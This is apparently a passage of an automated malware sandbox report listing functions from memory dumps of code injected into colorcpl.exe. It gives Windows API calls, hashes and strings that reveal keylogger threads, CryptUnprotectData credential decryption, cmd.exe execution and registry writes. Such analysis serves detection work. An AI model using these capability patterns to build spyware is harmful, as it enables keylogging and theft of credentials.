                                          • Part of subcall function 04AC3C92: GetLastError.KERNEL32(?,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?,?), ref: 04AC3CBA
                                        • _free.LIBCMT ref: 04ACDBC6
                                        • _free.LIBCMT ref: 04ACDBD8
                                        • _free.LIBCMT ref: 04ACDBEA
                                        • _free.LIBCMT ref: 04ACDBFC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 96f5488fa8e0ad148298b7e8139380f3d895ccd0c50820f417b8c61def74e9a1
                                        • Instruction ID: 14847aa1d191e4620c5d7801fcbd186c3e0848ad922f10ce0beacbf7af789739
                                        • Opcode Fuzzy Hash: 96f5488fa8e0ad148298b7e8139380f3d895ccd0c50820f417b8c61def74e9a1
                                        • Instruction Fuzzy Hash: 73F06D32509314ABAAE0EB69E289C1B73D9FB20724365C81DF49ADB500CF35FCD08B64
                                        Function 0691E961 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                        • Instruction ID: e15c11a7460e9e04c85ea999cd75fce302148a422b58da7c2382d245f6482d25
                                        • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                        • Instruction Fuzzy Hash: F7F096368042486BDAE0EB69F984C5A77DDAA45B20F751815F47CEFD00D770F880DA5C
                                        Function 04AC1548 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 04AC1566
                                          • Part of subcall function 04AC3C92: HeapFree.KERNEL32(00000000,00000000,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?), ref: 04AC3CA8
                                          • Part of subcall function 04AC3C92: GetLastError.KERNEL32(?,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?,?), ref: 04AC3CBA
                                        • _free.LIBCMT ref: 04AC1578
                                        • _free.LIBCMT ref: 04AC158B
                                        • _free.LIBCMT ref: 04AC159C
                                        • _free.LIBCMT ref: 04AC15AD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: ade881366a514a3e24310628b726e992f5e3c6e508803e5fed3c1c0698a74b55
                                        • Instruction ID: d50f5d520e1d854d5d0ca3c32792a0ea3d7333c68a662ca34856615f2e1af2e9
                                        • Opcode Fuzzy Hash: ade881366a514a3e24310628b726e992f5e3c6e508803e5fed3c1c0698a74b55
                                        • Instruction Fuzzy Hash: 98F01771806324AFDA816F26BA4540D3BA0F724734382C50AF87A9F654CB396E53AF80
                                        Function 06923B80 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __dosmaperr
                                        • String ID: H
                                        • API String ID: 2332233096-2852464175
                                        • Opcode ID: 025001eace35e284d02f7f8ceb0d8143efc63f8ac6326f5556ede81aad0919f8
                                        • Instruction ID: 981c9c7d34c0fcbc8875683d089624c810c6eb5a2ebb116d2c9b38cf2bb93193
                                        • Opcode Fuzzy Hash: 025001eace35e284d02f7f8ceb0d8143efc63f8ac6326f5556ede81aad0919f8
                                        • Instruction Fuzzy Hash: B5A16732A201258FDF59EF78DC91BAE7BA4EB46320F2401A9EC11DF295D7358816CB51
                                        Function 04A92446 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 04A924AD
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 04A924DC
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 04A9257C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Enum$InfoQueryValue
                                        • String ID: [regsplt]
                                        • API String ID: 3554306468-4262303796
                                        • Opcode ID: 51ee3182b961d9464882b3703685b4d0101aedcc7cb45d3fe100c2573d9381ce
                                        • Instruction ID: 29f5db440b90eddd3493e8e033833f56e57be7230398bff8e31cdf9aa44eb6c7
                                        • Opcode Fuzzy Hash: 51ee3182b961d9464882b3703685b4d0101aedcc7cb45d3fe100c2573d9381ce
                                        • Instruction Fuzzy Hash: CC510F72900119AAEB11EBD4DD91EEEB7BDEF04304F1005A9E505A6190EF70BA49CBA0
                                        Function 04ACB8C9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                        Download Yara Rule
                                        APIs
                                        • _strpbrk.LIBCMT ref: 04ACB918
                                        • _free.LIBCMT ref: 04ACBA35
                                          • Part of subcall function 04AB9AA3: IsProcessorFeaturePresent.KERNEL32(00000017,04AB9A75,04A8E1EC,?,?,00000000,04A8E1EC,00000000,?,?,04AB9A95,00000000,00000000,00000000,00000000,00000000), ref: 04AB9AA5
                                          • Part of subcall function 04AB9AA3: GetCurrentProcess.KERNEL32(C0000417,pth_unenc,04A8E1EC), ref: 04AB9AC7
                                          • Part of subcall function 04AB9AA3: TerminateProcess.KERNEL32(00000000), ref: 04AB9ACE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                        • String ID: *?$.
                                        • API String ID: 2812119850-3972193922
                                        • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                        • Instruction ID: 8951f446faa8a89890e4975ef53a922e1fba69467a71b8c6789cc56c7a8535ed
                                        • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                        • Instruction Fuzzy Hash: 24519175E00209AFDF14CFA8D881AADB7F5EF48314F24816DD854E7341E776BA018B60
                                        Function 0691C68E Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free_strpbrk
                                        • String ID: *?$.
                                        • API String ID: 3300345361-3972193922
                                        • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                        • Instruction ID: 1bc95c3b3d9ef3b51fa20dd1876be073119f20daf2c5fe31eef5fb1f89ce973e
                                        • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                        • Instruction Fuzzy Hash: 84515D75E4021AEFDB54DFA8C880AADBBF9EF88310F34416AD954EB740D6759A018B50
                                        Function 04AC0935 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\colorcpl.exe,00000104), ref: 04AC0975
                                        • _free.LIBCMT ref: 04AC0A40
                                        • _free.LIBCMT ref: 04AC0A4A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Windows\SysWOW64\colorcpl.exe
                                        • API String ID: 2506810119-1707929182
                                        • Opcode ID: dce70161ee9d4121abe848b624037c40b23d0e96fe060b061dcbeeb2c0a1340c
                                        • Instruction ID: 1d5343c6ec9c931bf528c1a7b56c8551e8dc838eb71b3192b2a65769a47056aa
                                        • Opcode Fuzzy Hash: dce70161ee9d4121abe848b624037c40b23d0e96fe060b061dcbeeb2c0a1340c
                                        • Instruction Fuzzy Hash: FD317371A05218FFEB61DFD9D980A9EBBFCEB85314F50406AF9149B200D670AE41DB90
                                        Function 04A99675 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04A92006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,04AF2248,04AF1FFC), ref: 04A92030
                                          • Part of subcall function 04A92006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 04A9204B
                                          • Part of subcall function 04A92006: RegCloseKey.ADVAPI32(00000000), ref: 04A92054
                                          • Part of subcall function 04A99F23: GetCurrentProcess.KERNEL32(?,?,?,04A8C663,WinDir,00000000,00000000), ref: 04A99F34
                                        • _wcslen.LIBCMT ref: 04A99744
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                        • String ID: .exe$program files (x86)\$program files\
                                        • API String ID: 37874593-1203593143
                                        • Opcode ID: cbc0cc6a70828e94fc795b9ea6df7b06e44eb60a57a41e704e3a987177ff2bde
                                        • Instruction ID: b152fd60b84d0bf5471c04d358bbb787c3a1cce94771219a01a6bac1bfb0ffcb
                                        • Opcode Fuzzy Hash: cbc0cc6a70828e94fc795b9ea6df7b06e44eb60a57a41e704e3a987177ff2bde
                                        • Instruction Fuzzy Hash: 322150F2A002047BBF18BBF49E94DFF76EDEB88118B04057DE406A7281ED25BD098661
                                        Function 04A89203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateThread.KERNEL32(00000000,00000000,04A89305,?,00000000,00000000), ref: 04A8928B
                                        • CreateThread.KERNEL32(00000000,00000000,04A892EF,?,00000000,00000000), ref: 04A8929B
                                        • CreateThread.KERNEL32(00000000,00000000,04A89311,?,00000000,00000000), ref: 04A892A7
                                          • Part of subcall function 04A8A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 04A8A0BE
                                          • Part of subcall function 04A8A0B0: wsprintfW.USER32 ref: 04A8A13F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateThread$LocalTimewsprintf
                                        • String ID: Offline Keylogger Started
                                        • API String ID: 465354869-4114347211
                                        • Opcode ID: 2f50065818cf2650fdeee8b194d285ebf786498105f6ec58108b51cbdde4b370
                                        • Instruction ID: 865a71cc96eef3195fdb2c9228b5ef934a28214195401d7d998e9c3234c62fce
                                        • Opcode Fuzzy Hash: 2f50065818cf2650fdeee8b194d285ebf786498105f6ec58108b51cbdde4b370
                                        • Instruction Fuzzy Hash: 5411A3F26002083FB610BB699DC5DBB7AACDB81198F40055DF84506181EA617E05CAF2
                                        Function 04A89E37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04A8A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 04A8A0BE
                                          • Part of subcall function 04A8A0B0: wsprintfW.USER32 ref: 04A8A13F
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        • CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 04A89EB7
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 04A89EC3
                                        • CreateThread.KERNEL32(00000000,00000000,04A8931D,?,00000000,00000000), ref: 04A89ECF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateThread$LocalTime$wsprintf
                                        • String ID: Online Keylogger Started
                                        • API String ID: 112202259-1258561607
                                        • Opcode ID: 7306362c44eefcadf1efdbba535aab77e2d56649f4307daeffb5e3c135b838d1
                                        • Instruction ID: 059190bd028b15a2c35669111d1220e3ab38b9ed6aefb13aee2f66b85b61349e
                                        • Opcode Fuzzy Hash: 7306362c44eefcadf1efdbba535aab77e2d56649f4307daeffb5e3c135b838d1
                                        • Instruction Fuzzy Hash: DC0192E1B002183EFB207B798DC6DBF7E6DDB8259CF40049DF94516182D9557C0686F2
                                        Function 04A86071 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,04A86039,?), ref: 04A86090
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A86097
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: CryptUnprotectData$crypt32
                                        • API String ID: 2574300362-2380590389
                                        • Opcode ID: 4293f4113d085945438c2564dfad9610f8b229bf1b7019aac2f26c9d6766b30e
                                        • Instruction ID: 8d1510139a4367835cee5d6c7eaf94b509a1db8b92eb71ef10b7f7adf4ff6acb
                                        • Opcode Fuzzy Hash: 4293f4113d085945438c2564dfad9610f8b229bf1b7019aac2f26c9d6766b30e
                                        • Instruction Fuzzy Hash: 3B01D875A04215ABEF18DFB9D854DBFBBB8EB54200B00826EE955D7240D631E901CB90
                                        Function 04A8513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,04A85139), ref: 04A85153
                                        • CloseHandle.KERNEL32(?), ref: 04A851AA
                                        • SetEvent.KERNEL32(?), ref: 04A851B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandleObjectSingleWait
                                        • String ID: Connection Timeout
                                        • API String ID: 2055531096-499159329
                                        • Opcode ID: 5ceb1c06502f52bea5e3875e737b4c033e9d020cfeeab22dfd48c390537c9f60
                                        • Instruction ID: 86a289201f28b21392ae483946f7255f00d85caf8ffe7c884da5c116d5d3af9a
                                        • Opcode Fuzzy Hash: 5ceb1c06502f52bea5e3875e737b4c033e9d020cfeeab22dfd48c390537c9f60
                                        • Instruction Fuzzy Hash: E901F731E42B40BFFB26BF36898556BBFE5FF11209300095DD9D346A20DB65B801CB51
                                        Function 04A8D1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04A8D25E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throw
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 2005118841-1866435925
                                        • Opcode ID: c35cf9b6d1dc5449eecf39bb823b79183d50c938b42c191026a2350a27df5ac0
                                        • Instruction ID: 3fc10fe01f8f2b325d4660b68fea64a67c89d85b9454ac595e9a06389303831c
                                        • Opcode Fuzzy Hash: c35cf9b6d1dc5449eecf39bb823b79183d50c938b42c191026a2350a27df5ac0
                                        • Instruction Fuzzy Hash: BA01AD726843087BFB54FB95C912FBD7378EB10704F00840CAA226E0C1FA61BA068B31
                                        Function 04A94839 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 04A9487B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell
                                        • String ID: /C $cmd.exe$open
                                        • API String ID: 587946157-3896048727
                                        • Opcode ID: cb3dc80b08ee64abd6217674cf587e0075fbf54d47ae320d6dae94168d6be7c7
                                        • Instruction ID: d852c24c9371c61e10639c7f639422f96fcbc37bdebbb3d99c2fdb737c6e6fec
                                        • Opcode Fuzzy Hash: cb3dc80b08ee64abd6217674cf587e0075fbf54d47ae320d6dae94168d6be7c7
                                        • Instruction Fuzzy Hash: B0F0E1712483086BE714FBB5D990DFFB3ACEFA4218F80492EA15782191EE34BD0AC651
                                        Function 04A92006 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,04AF2248,04AF1FFC), ref: 04A92030
                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 04A9204B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 04A92054
                                        Strings
                                        • http\shell\open\command, xrefs: 04A92026
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: http\shell\open\command
                                        • API String ID: 3677997916-1487954565
                                        • Opcode ID: 0fd507909d3580d7b42fdd4d66e5796ccad779e465ab332d2cb97b1a371fb2c6
                                        • Instruction ID: 6fe9b143fd89d91041a325750ff224c2845a19ce315b8000cd45af9678cbde02
                                        • Opcode Fuzzy Hash: 0fd507909d3580d7b42fdd4d66e5796ccad779e465ab332d2cb97b1a371fb2c6
                                        • Instruction Fuzzy Hash: 6EF06871500118FBEF60AA95DC49EDFBBFCEB94705F0041A5B515E2100DB756E59CBA0
                                        Function 04A92204 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,04AF21E8), ref: 04A9220F
                                        • RegSetValueExW.ADVAPI32(04AF2200,00000000,00000000,?,00000000,00000000,04AF2200,?,?,00000001), ref: 04A9223E
                                        • RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 04A92249
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateValue
                                        • String ID: pth_unenc
                                        • API String ID: 1818849710-4028850238
                                        • Opcode ID: 2bc9471fda7d593b7f2c4a1a91d91921a78ae21d6d4c9af38586f90c55dda5d5
                                        • Instruction ID: 0660e78457158aaac461d639fe070613620e7ed836a66a5a58d5645b721c905a
                                        • Opcode Fuzzy Hash: 2bc9471fda7d593b7f2c4a1a91d91921a78ae21d6d4c9af38586f90c55dda5d5
                                        • Instruction Fuzzy Hash: CEF04972541118BBEF00AFA0ED05FFA37ACEF44654F008559F9069A110EA36AE15DAA0
                                        Function 04A8C9CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 04A8C9D9
                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 04A8CA18
                                          • Part of subcall function 04AB33ED: _Yarn.LIBCPMT ref: 04AB340C
                                          • Part of subcall function 04AB33ED: _Yarn.LIBCPMT ref: 04AB3430
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04A8CA3E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                        • String ID: bad locale name
                                        • API String ID: 3628047217-1405518554
                                        • Opcode ID: 851c07d16bdacb72d8bc6bb616d0a2be38ac12f7d01892c078fceb99d66a685f
                                        • Instruction ID: bb6f9742ba05b92f8531a77b1c26a5cec4e3daa6fd46b252f0075297d5845c3e
                                        • Opcode Fuzzy Hash: 851c07d16bdacb72d8bc6bb616d0a2be38ac12f7d01892c078fceb99d66a685f
                                        • Instruction Fuzzy Hash: 9BF0A431400604EAE728FB60EA41ADBB7A8EF18214F40492DE546528D0FF20BA08CBA1
                                        Function 04A81497 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 04A814A1
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A814A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetLastInputInfo$User32.dll
                                        • API String ID: 2574300362-1519888992
                                        • Opcode ID: 05d6618b26ded8e761a6c49da273bd1b4cd4c7072e8295070dd8c1b44bfc0cf5
                                        • Instruction ID: 21ff6bd6c52d1b435e13c0b0fefab7b8a7eccc6f408959a617037a030ad17f01
                                        • Opcode Fuzzy Hash: 05d6618b26ded8e761a6c49da273bd1b4cd4c7072e8295070dd8c1b44bfc0cf5
                                        • Instruction Fuzzy Hash: 6FB092F2D82701EB8E005FB2A90EE963AB8F6286023000655B06386100DABD2802CF24
                                        Function 06917484 Relevance: 6.4, APIs: 4, Instructions: 370COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                        • Instruction ID: 0e331f77edb333c5d3e12ceb668cc06bd518ce4168ac2fb34ae46bbd9265f4e5
                                        • Opcode Fuzzy Hash: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                        • Instruction Fuzzy Hash: 66C12975D0024E9FEBA0DFB89C40AA97BBDEF45210F3405AAD4A4DFA81E7318D41C795
                                        Function 04AC8C13 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        • Opcode ID: 03e8336be6feeefa5c512672f5a0d1266db9fcb18614ce6fe0fce40636c8e9f5
                                        • Instruction ID: 5f1060ff6659ab80d481ddbe4b251d10345c98f628d50d9e0410ed72437b8e58
                                        • Opcode Fuzzy Hash: 03e8336be6feeefa5c512672f5a0d1266db9fcb18614ce6fe0fce40636c8e9f5
                                        • Instruction Fuzzy Hash: 7EA15532A04386DFEB62EF28C880BAEBBE5FF55315F1841ADD5959B281D23CE941C750
                                        Function 069199D8 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        • Opcode ID: 03e8336be6feeefa5c512672f5a0d1266db9fcb18614ce6fe0fce40636c8e9f5
                                        • Instruction ID: 0a13447b8c56798049a2091d6b70589f1b8bebfa0e35cc154f0dbc96e55d6b4e
                                        • Opcode Fuzzy Hash: 03e8336be6feeefa5c512672f5a0d1266db9fcb18614ce6fe0fce40636c8e9f5
                                        • Instruction Fuzzy Hash: 61A17872E4038E9FEB61CF68C8A07AEBBE9EF51350F34456DD4999FA80D2348941C750
                                        Function 0691AD28 Relevance: 6.3, APIs: 4, Instructions: 300COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1a9ba8701dd1ff07f611dd49c6527d64924ec2b1001cab84c3fe07def6274ef
                                        • Instruction ID: 222a1ac97ad57ad84454beb2669b8590f14d69b053a9b74ee3a3212be1fb1b4f
                                        • Opcode Fuzzy Hash: b1a9ba8701dd1ff07f611dd49c6527d64924ec2b1001cab84c3fe07def6274ef
                                        • Instruction Fuzzy Hash: 30C1F374E0424D9FDB91DFA8C940BADBBB5AF49310F244098E964AB795D3318D40CBA5
                                        Function 04AD3DF4 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
